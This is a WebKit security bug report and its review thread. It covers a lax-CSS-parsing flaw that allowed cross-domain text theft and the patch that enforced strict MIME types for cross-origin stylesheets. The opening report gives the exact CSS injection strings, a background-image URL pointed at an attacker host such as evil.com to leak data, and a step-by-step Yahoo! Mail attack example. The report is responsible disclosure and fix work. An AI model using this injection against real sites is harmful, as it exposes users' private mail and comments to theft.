Bug 29820 - Lax CSS parsing leads to limited cross-domain theft for a subset of sites
Summary: Lax CSS parsing leads to limited cross-domain theft for a subset of sites
Status: RESOLVED FIXED
Alias: None
Product: Security
Classification: Unclassified
Component: Security (show other bugs)
Version: Other
Hardware: PC All
: P2 Normal
Assignee: WebKit Security Group
URL:
Keywords: InRadar
Depends on:
Blocks: 35032
  Show dependency treegraph
 
Reported: 2009-09-28 11:40 PDT by Chris Evans
Modified: 2023-11-23 05:06 PST (History)
12 users (show)

See Also:


Attachments
Patch and test (18.01 KB, patch)
2009-11-04 20:39 PST, Chris Evans
hyatt: review-
Details | Formatted Diff | Diff
Address all comments from review (21.64 KB, patch)
2009-11-11 14:39 PST, Chris Evans
hyatt: review-
Details | Formatted Diff | Diff
Latest patch -- merge with WebKit head (21.16 KB, patch)
2009-12-14 18:02 PST, Chris Evans
abarth: review+
Details | Formatted Diff | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Chris Evans 2009-09-28 11:40:00 PDT
[Apologies for not filing this sooner. I thought I had filed it, but it seems not. I've been sat on this for too long. Since this affects all browsers equally, I was going to just discuss it on my blog and let the web community figure out the best way to address this. However, I thought it would be polite to offer WebKit / Safari a chance to fix it first].

The attack involves cross-domain CSS stylesheet loading. Because the CSS
parser is very lax, it will skip over any amount of preceding and following
junk, in its quest to find a valid selector. Here is an example of a valid
selector:

body { background-image: url('http://www.evil.com/blah'); }

If a construct like this can be forced to appear anywhere in a cross-domain document, then cross-domain theft may be possible. The attacker can introduce this construct into a page by injecting two strings:

1) {}body{background-image:url('http://google.com/
(Note that the seemingly redundant {} is to resync
the CSS parser to make sure the evil descriptor parses properly. Further note that having the url start like a valid url is required to steal the text in some browsers).

2) ');}

Any anything between those two strings will then be cross-domain stealable! The data is stolen cross domain with e.g.
window.getComputedStyle(body_element, null).getPropertyValue('background-image');
(This works in most browsers; for IE, you use ele.currentStyle.backgroundImage)

There are a surprising number of places in internet sites where an attacker
can do this. It can apply to HTML, XML, JSON, XHTML, etc.

At this point, an example is probably useful. To set up for this example, you need:
a) Get a Yahoo! Mail account.
b) Make sure you are logged into it.
c) E-mail the target victim Yahoo! account with the subject
');}
d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate one).
e) E-mail the target victim Yahoo! account with the subject
{}body{background-image:url('http://google.com/
f) Send victim to theft page https://cevans-app.appspot.com/static/yahoocss.html
g) The stolen text shown is achieved via cross-domain CSS theft.

Other good examples I've had success with are social networking sites, where the attacker gets to leave arbitrary-text comments which are rendered on the victim's trusted page.

The main common construct that prevents exploitation is newlines.
Obviously, newlines cannot be considered a defense! Escaping or encoding of quote characters can also interfere with exploitation. One useful trick: if ' is escaped, use " to enclose the CSS string.

Part 2 (on possible solutions) to follow.
Comment 1 David Kilzer (:ddkilzer) 2009-09-28 11:43:25 PDT
<rdar://problem/7258451>
Comment 2 Chris Evans 2009-09-28 11:54:52 PDT
Possible solutions.

First, there are some solutions it is easy to reject:

1) Restrict read of CSS text if it came from a different domain.
This is a useful defense that I filed a while ago in a different bug. But it
will not help in this case. The attacker can simply use
http://www.attacker.com/ as a prefix for the background-image value, and wait
for the HTTP GET to arrive which includes the stolen text in the payload.

2) Do not send cookies for cross-domain CSS loads.
This probably breaks a load of sites? It is certainly a riskier approach. I
have not dared try it!


The solution that I'm playing with is as follows:

- Activate "strict MIME type required" in the event that the CSS was loaded
(via link tag or @import) as a cross-domain resource.

- Also, crash hard if a CSS load fails due to strict MIME type test failure.

I've been running my build locally with these changes for a few days and there
seems to be some merit in this approach, i.e. my browser hasn't crashed apart
from when I hit my attack URLs.

I see that WebKit has a history of defaulting to "strict MIME type required"
for _all_ CSS loads, and that historically broke some sites like dell.com and
was reverted.
Perhaps the web at large now has its MIME types in order well enough to at
least enforce strict for cross-domain CSS loads? If too much breaks, we have
the additional level we can introduce of trying to parse the cross-domain CSS
but bailing on first syntax error. I'd like to avoid a test that is going that
deep into nuance, however.
Comment 3 Chris Evans 2009-09-28 12:06:09 PDT
Here's the patch I'm running with. Including 3rd chunk which crashes on mismatched MIME type when strict mode is on... (note -- not adding as an attachment because it most certainly is not a proposed patch :P )

Index: html/HTMLLinkElement.cpp
===================================================================
--- html/HTMLLinkElement.cpp    (revision 48734)
+++ html/HTMLLinkElement.cpp    (working copy)
@@ -252,6 +252,12 @@
     if (enforceMIMEType && document()->page() && !document()->page()->settings()->enforceCSSMIMETypeInStrictMode())
         enforceMIMEType = false;
 
+    // If we're loading a stylesheet cross-domain, always enforce a stricter
+    // MIME type check. This prevents an attacker playing games by injecting
+    // CSS strings into HTML, XML, JSON, etc. etc.
+    if (!document()->securityOrigin()->canRequest(KURL(ParsedURLString, url)))
+        enforceMIMEType = true;
+
     m_sheet->parseString(sheet->sheetText(enforceMIMEType), strictParsing);
     m_sheet->setTitle(title());
 
Index: css/CSSImportRule.cpp
===================================================================
--- css/CSSImportRule.cpp       (revision 48734)
+++ css/CSSImportRule.cpp       (working copy)
@@ -26,6 +26,7 @@
 #include "DocLoader.h"
 #include "Document.h"
 #include "MediaList.h"
+#include "SecurityOrigin.h"
 #include "Settings.h"
 #include <wtf/StdLibExtras.h>
 
@@ -62,7 +63,10 @@
 
     CSSStyleSheet* parent = parentStyleSheet();
     bool strict = !parent || parent->useStrictParsing();
-    String sheetText = sheet->sheetText(strict);
+    bool enforceMIMEType = strict;
+    if (!parent || !parent->doc() || !parent->doc()->securityOrigin()->canRequest(KURL(ParsedURLString, url)))
+        enforceMIMEType = true;
+    String sheetText = sheet->sheetText(enforceMIMEType);
     m_styleSheet->parseString(sheetText, strict);
 
     if (strict && parent && parent->doc() && parent->doc()->settings() && parent->doc()->settings()->needsSiteSpecificQuirks()) {
Index: loader/CachedCSSStyleSheet.cpp
===================================================================
--- loader/CachedCSSStyleSheet.cpp      (revision 48734)
+++ loader/CachedCSSStyleSheet.cpp      (working copy)
@@ -138,7 +138,9 @@
     // This code defaults to allowing the stylesheet for non-HTTP protocols so
     // folks can use standards mode for local HTML documents.
     String mimeType = extractMIMETypeFromMediaType(response().httpHeaderField("Content-Type"));
-    return mimeType.isEmpty() || equalIgnoringCase(mimeType, "text/css") || equalIgnoringCase(mimeType, "application/x-unknown-content-type");
+    if (!(mimeType.isEmpty() || equalIgnoringCase(mimeType, "text/css") || equalIgnoringCase(mimeType, "application/x-unknown-content-type")))
+        *((char*)NULL) = '\0';
+    return true;
 }
  
 }
Comment 4 Maciej Stachowiak 2009-09-28 22:23:54 PDT
(In reply to comment #2)
>
> 
> I see that WebKit has a history of defaulting to "strict MIME type required"
> for _all_ CSS loads, and that historically broke some sites like dell.com and
> was reverted.
> Perhaps the web at large now has its MIME types in order well enough to at
> least enforce strict for cross-domain CSS loads? If too much breaks, we have
> the additional level we can introduce of trying to parse the cross-domain CSS
> but bailing on first syntax error. I'd like to avoid a test that is going that
> deep into nuance, however.

We could experiment with doing that, but the risk may be somewhat high. The security benefit could be worth it however.
Comment 5 Chris Evans 2009-09-29 08:23:59 PDT
Note that any experimental WebKit change would get an automatic workout in the Chrome dev channel builds fairly quickly ;-)
Comment 6 Adam Barth 2009-09-29 13:19:11 PDT
(In reply to comment #5)
> Note that any experimental WebKit change would get an automatic workout in the
> Chrome dev channel builds fairly quickly ;-)

This is a good opportunity to use UMA to see which of these mitigations are feasible w.r.t. compatibility.
Comment 7 Chris Evans 2009-09-29 13:40:38 PDT
This is something I continue to fail to have time to look at -- hence the filing of the bug upstream :-/
Comment 8 Chris Evans 2009-11-04 14:20:07 PST
Yeah, I got a good patch which is both conservatively secure and conservatively compatible. Compatibility has been checked with a run across 500,000 URLs, and in fact the solution was derived from these URLs. I'll upload the patch once I have a good test too :)
Comment 9 Chris Evans 2009-11-04 20:38:32 PST
Patch to follow, I think it's good. I've done a lot of testing including:
- Full LayoutTests (clean)
- Mining of 500,000 URLs for interesting cross-domain CSS usage. Best I know, the only site affected by this is http://practiceexam.keys2drive.ca/quiz.php which looks slightly different but is still acceptable and usable. Regrettably, this pages uses text/html for a cross-domain CSS load and prefixes valid CSS with "<style>".
- Turns out that cross-domain text/html with a valid CSS payload, and text/plain with a valid CSS payload does occur (28 occurrences in 500,000 URLs including curiously configure.dell.com)! Therefore this case is accounted for.
- Other common MIME types mistakenly used for cross-domain CSS loads include application/octet-stream (53 / 500,000), application/css (1), application/x-pointplus (1)
Comment 10 Chris Evans 2009-11-04 20:39:23 PST
Created attachment 42540 [details]
Patch and test
Comment 11 Adam Barth 2009-11-05 08:22:51 PST
Nice idea Chris.  I'm going to let an expert in this area review the actual code, but I like the approach.

Have you shared the approach with the other browser vendors?  It would be best if we all did the same thing.
Comment 12 Maciej Stachowiak 2009-11-07 19:24:44 PST
This looks like a promising approach (have not reviewed the CSS parser details yet).

I'm sorry to bring these to the table late, but here are some other ideas I thought of:

1) For cross-site stylesheet loads, disable Cookies, HTTP Auth, and sending of client-side certs (or perhaps any SSL). Then the only risk is to content that is only protected by a firewall. I'm not sure if this would break anything, but it would depend less on the details of the CSS parser so it may be more robust.

2) For cross-site styleseet loads, if the stylesheet is returned with an incorrect MIME type, disable scripting access to the stylesheet (but still apply the styles). I'm not sure if this would be sufficiently compatible or if it would fully close the hole.

Any thoughts on these?
Comment 13 Sam Weinig 2009-11-08 14:48:09 PST
> 2) For cross-site styleseet loads, if the stylesheet is returned with an
> incorrect MIME type, disable scripting access to the stylesheet (but still
> apply the styles). I'm not sure if this would be sufficiently compatible or if
> it would fully close the hole.
> 

If I am not mistaken, I believe we now always disallow scripting access to cross-site stylesheets. (see http://trac.webkit.org/changeset/50587).

I am cc'ing hyatt, who would probably be the best person the review the change to the CSS parser.
Comment 14 Sam Weinig 2009-11-08 14:59:20 PST
Comment on attachment 42540 [details]
Patch and test

Not a full review, just some passing comments

- I think we should be using the term crossOrigin instead of crossDomain since we are really talking about the origin tuple, not just the domain.
- I am not a fan of the term "good" in the context you are using it.  What is a "good" header?  What is a "good" CSS rule?  Please be more explicit with those names.
- Is this something we should add a Setting for while it is still experimental?

> +void
> +CSSParser::invalidBlockHit() {

Two nits.  The "void" should be on the same line as the rest of the function prototype.  The { should be on the next line.
Comment 15 Chris Evans 2009-11-08 21:18:29 PST
@Sam, comment #13: unfortunately, the referenced change does not prevent script access. It simply stops raw CSS rule text access via the "cssRules" array (bringing WebKit in line with all other browsers). It leaves the getComputedStyle().getPropertyValue() avenue open. And even if we closed that, it's still not good enough, see next comment...

@Sam, comment #14: thanks. I'll use "syntacticallyValid" instead of "good".
Comment 16 Chris Evans 2009-11-08 22:24:03 PST
@Maciej, comment #12:

Idea #2 isn't secure. The Yahoo Mail example given does not need script to steal the data. The stolen data is effectively sent to evil.com for the fetch of the background-image URL. There are probably other ways that data can be stolen by monitoring the effects of CSS.

Idea #1 is more interesting. I thought I had a good reason to not go that route, but I seem to have forgotten it. There are certainly sites that rely on cross-origin authenticated <script> loads; I'm not sure about CSS.
Mainly, it would be very challenging to semi-automatically test in the same way as I tested my change.
Comment 17 Chris Evans 2009-11-09 22:51:17 PST
Hyatt, any thoughts?
Comment 18 Maciej Stachowiak 2009-11-10 18:36:42 PST
(In reply to comment #16)
> @Maciej, comment #12:
> 
> Idea #2 isn't secure. The Yahoo Mail example given does not need script to
> steal the data. The stolen data is effectively sent to evil.com for the fetch
> of the background-image URL. There are probably other ways that data can be
> stolen by monitoring the effects of CSS.

Good point. I withdraw the idea.
 
> Idea #1 is more interesting. I thought I had a good reason to not go that
> route, but I seem to have forgotten it. There are certainly sites that rely on
> cross-origin authenticated <script> loads; I'm not sure about CSS.
> Mainly, it would be very challenging to semi-automatically test in the same way
> as I tested my change.

I heard recently that IE no longer sends Cookie headers for cross-site <script> loads, which is what made me think of the idea for styles. I think we should consider #1 if it turns out to be sufficiently compatible, perhaps in combination with your change.

I will try to get someone with CSS parser knowledge to look at your patch.
Comment 19 Chris Evans 2009-11-10 18:48:40 PST
Where did you hear that IE doesn't sent cookies for cross-site <script> loads? Maybe you're thinking of Gazelle?

I spoke with Charlie Reis recently and we talked about just this. A lot of sites unfortunately depend on it. https://pip.verisignlabs.com/ was the example given. I've not checked myself, but Charlie is pretty reliable.

The reason I prefer the "stricter CSS" approach is that sites are welcome to depend on cookies being sent for cross-origin CSS, and it's not an unreasonable thing to do. On the other hand, it's not reasonable for sites to load cross-origin CSS with bust-up MIME types with a CSS syntax error preceeding valid CSS.

However, I would of course be delighted if we could just not send cookies for cross-site script, CSS etc. I just think it'll break stuff. May be worth an experiment in the future...
Comment 20 Dave Hyatt 2009-11-11 10:54:01 PST
Comment on attachment 42540 [details]
Patch and test

You need to patch XML processing instructions also, and there needs to be a test for those.
Comment 21 Chris Evans 2009-11-11 11:24:20 PST
I agree the need to test XML processing instructions. I'll get on that.
However, I don't think a code change is needed because "strict" mode is enforced, which requires a valid CSS MIME type. This is certainly subtle -- strict mode is used because of a defaulted C++ parameter, so I'll add a comment.
Comment 22 Chris Evans 2009-11-11 14:39:15 PST
Created attachment 43007 [details]
Address all comments from review
Comment 23 Chris Evans 2009-11-11 14:43:24 PST
New patch updated, featuring:
- Fixes Sam's naming and style comments.
- Adds a test for the CSS in XML case noted by Dave.
- Adds a comment and makes the "strict" mode of CSS in XML more explicit.
- Tweaks one of the tests to check that a semantically invalid descriptor (i.e. contains unknown property) loads OK.
- Better ChangeLog entry.
Comment 24 Chris Evans 2009-11-13 15:46:16 PST
Ping? I'm now away until Tuesday, and then limited availability for Tues & Weds prior to three weeks away. I'd rather not lose this small window for landing this.
Comment 25 Dave Hyatt 2009-11-16 14:46:40 PST
Comment on attachment 43007 [details]
Address all comments from review

The CSSParser changes seems iffy to me.  Why limit to just a "header" check?  What if you hit an invalid block first and then hit some valid rules following the invalid block?

What is the point of the extra enforceMIMEType argument to parseString?  It looks like it matches whether or not you're using strictParsing always, so I don't get the point of it.
Comment 26 Dave Hyatt 2009-11-16 14:57:58 PST
That previous comment about enforceMIMEType may not have been totally clear.  I'm specifically wondering about CSSImportRule.  It looks like enforceMIMEType is never being checked against the setting:

HTMLLinkElement has the following code:

if (enforceMIMEType && document()->page() && !document()->page()->settings()->enforceCSSMIMETypeInStrictMode())
    enforceMIMEType = false;

This check was really only necessary for iWeb, and we didn't bother pushing it into import rules.  You added the enforceMIMEType variable to the CSSImportRule check but then didn't bother doing anything with it, so it just matches strictParsing.

I don't see a need for that check in sub-stylesheets, so please just get rid of enforceMIMEType in CSSImportRule.
Comment 27 Chris Evans 2009-11-17 18:31:14 PST
Thanks for taking a detailed look, Dave.

@25: "The CSSParser changes seems iffy to me.  Why limit to just a "header" check? 
What if you hit an invalid block first and then hit some valid rules following
the invalid block?"

The attacker, unfortunately, can easily inject some valid rules after some preceding junk. So in that case (invalid block then valid rules), we must reject. 


@26: I probably need to simply think about this some more, but I'm not sure I understand the suggestion yet. "enforceMIMEType" is a renaming of "strict" to make the variable name clearer. I've tried to minimally disturb the logic from the existing state. All I've done, really, is engage "strict" mode if there is cross-origin CSS loading that does not start with what looks like CSS.
Comment 28 Chris Evans 2009-11-29 21:35:08 PST
Any thoughts re: my comment #27?

If there are still concerns, perhaps we should schedule lunch @ Apple to finally land this thing? I'm currently on vacation but Weds 9th Dec would work. I don't want to delay some form of landed solution too close to the Dec 28th deadline.
Comment 29 Chris Evans 2009-12-08 14:29:41 PST
@26: I've now had the time to have a more thorough look. I believe the only logic change I made is to add the cross-domain check.
Perhaps the confusion is the rename of "strict" to the more descriptive "enforceMIMEType". So, "enforceMIMEType" is definitely used -- and used with the exact same logic as before the patch.
Comment 30 Dave Hyatt 2009-12-14 10:00:00 PST
"(In reply to comment #27)
>
> @26: I probably need to simply think about this some more, but I'm not sure I
> understand the suggestion yet. "enforceMIMEType" is a renaming of "strict" to
> make the variable name clearer. I've tried to minimally disturb the logic from
> the existing state. All I've done, really, is engage "strict" mode if there is
> cross-origin CSS loading that does not start with what looks like CSS.

Except you haven't made it clearer.  That variable name is wrong in that context, and the change is unnecessary.   Look at HTMLLinkElement:

m_sheet->parseString(sheetText, strictParsing);

Now look at what you did in CSSImportRule:

m_styleSheet->parseString(sheetText, enforceMIMEType);

The argument to parseString is whether or not CSS Is using strict parsing.  It's not just about MIME type enforcement.  You just didn't need to introduce that variable name here, since that variable was only introduced as a local in the other spot so that it could be set to false if the setting was present.
Comment 31 Chris Evans 2009-12-14 16:07:39 PST
Thanks, Dave. I see and agree with the concern now.

I fixed it, but ironically, I discovered upon "svn update" that r52032 actually introduces a split of "strict" vs. "enforeMIMEType" to the CSS import code. I'm doing a manual merge now and will post an updated patch shortly.
Comment 32 Chris Evans 2009-12-14 18:02:27 PST
Created attachment 44830 [details]
Latest patch -- merge with WebKit head
Comment 33 Chris Evans 2009-12-14 18:06:14 PST
Ok, updated patch attached.
Note that "enforceMIMEType" was introduced by (completely unrelated) r52032. This makes the latest patch smaller, and sort of cancels the clarified complaint in comment #30 :)

Any further changes you would like?
Comment 34 Chris Evans 2009-12-17 21:09:13 PST
Friendly ping? :)
Comment 35 Chris Evans 2009-12-31 01:12:53 PST
Now public, via Mozilla checkin and my blog.
Unless there are further comments on the patch, can we get this landed?
Comment 36 Adam Barth 2010-01-04 15:10:37 PST
Comment on attachment 44830 [details]
Latest patch -- merge with WebKit head

Chris appears to have addressed hyatt's concerns.  This security issue is public now and needs to get fixed as soon as possible.  The discussion on this bug seems to have stalled.

As far as I can tell, the patch seems fine.  Marking as review+.  If you have concerns, let me know.  If we need to iterate on this after landing, we can do that too.
Comment 37 Adam Barth 2010-01-04 21:20:06 PST
Committed r52784: <http://trac.webkit.org/changeset/52784>
Comment 38 Chris Evans 2010-08-09 16:01:14 PDT
Un-hiding; all very public by now and I want to fix the link from http://www.owlfolio.org/htmletc/css-data-theft/